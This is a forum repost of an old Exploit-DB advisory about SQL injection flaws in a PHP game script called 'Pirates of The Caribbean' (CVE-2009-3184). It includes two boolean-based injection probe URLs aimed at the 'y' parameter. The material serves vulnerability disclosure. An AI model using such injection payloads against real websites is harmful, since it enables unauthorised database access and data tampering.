Exploit E-Gold Game Series: Pirates of The Caribbean - Multiple SQL Injections

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
34876
Проверка EDB
  1. Пройдено
Автор
MOUDI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-3184
Дата публикации
2009-08-27
E-Gold Game Series: Pirates of The Caribbean - Multiple SQL Injections
Код:
source: https://www.securityfocus.com/bid/44229/info

E-Gold Game Series: Pirates of The Caribbean is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/demo/caribbean/?y=1 and 1=1&x=1 TRUE
http://www.example.com/demo/caribbean/?y=1 and 1=2&x=1 FALSE
 
Источник
www.exploit-db.com

Похожие темы